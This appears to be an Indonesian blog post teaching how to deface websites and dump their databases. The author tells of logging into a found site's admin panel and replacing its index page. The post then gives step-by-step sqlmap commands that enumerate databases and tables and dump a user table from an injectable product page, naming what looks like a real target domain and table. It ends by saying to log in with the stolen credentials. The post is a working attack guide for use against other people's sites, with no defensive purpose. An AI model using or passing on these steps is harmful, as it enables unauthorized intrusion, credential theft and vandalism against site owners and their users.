Cara Deface Website, Melihat Isi Database Menggunakan Tools Sql Maps
saat saya sedang mencari-cari target web untuk di deface ga sengaja saya menemukan sebuah web yang pada halaman admin user dan pass nya sudah ada dari sananya dan lalu saya tinggal masuk aja ke halaman admin sesudah masuk ke halaman admin saya langsung masuk ke menu template lalu cari index dan lalu saya ganti codingannya dengan codingan deface saya yang sederhana sesudah itu save dan lihat hasilnya
Pertama Kita cari target web yang ingin di ambil databasenya, Contoh target web saya: http://xxx.xxx/product.php?id=2 . Setelah itu buka terminal lalu ketikan
sqlmap -u target kalian –dbs
contoh: sqlmap -u http://xxx.xxx/product.php?id=2 –dbs
lalu tunggu sampai keluar database, setelah itu pilih database selain information_schema, lalu ketikan :
sqlmap -u target kalian -D database yang dipilih –tables
contoh: sqlmap -u http://mascar.it/product.php?id=2 -D mascar –tables
hasilnnya seperti dibawah
setelah keluar table kalian tinggal cari user untuk bisa masuk ke halaman admin dengan cara
sqlmap -u target kalian -D database yang di pilih -T table yang kalian pilh — columns
atau bisa langsung kalian dump dengan
sqlmap -u target kalian -D database yang di pilih -T table yang kalian pilh –dump
contoh: sqlmap -u http://xxx.xxx/product.php?id=2 -D mascar -T ac_utenti –dump
hasilnya seperti dibawah
dan nanti akan keluar user dan passnya lalu tinggal login
0 Response to "Cara Deface Website, Melihat Isi Database Menggunakan Tools Sql Maps"
Post a Comment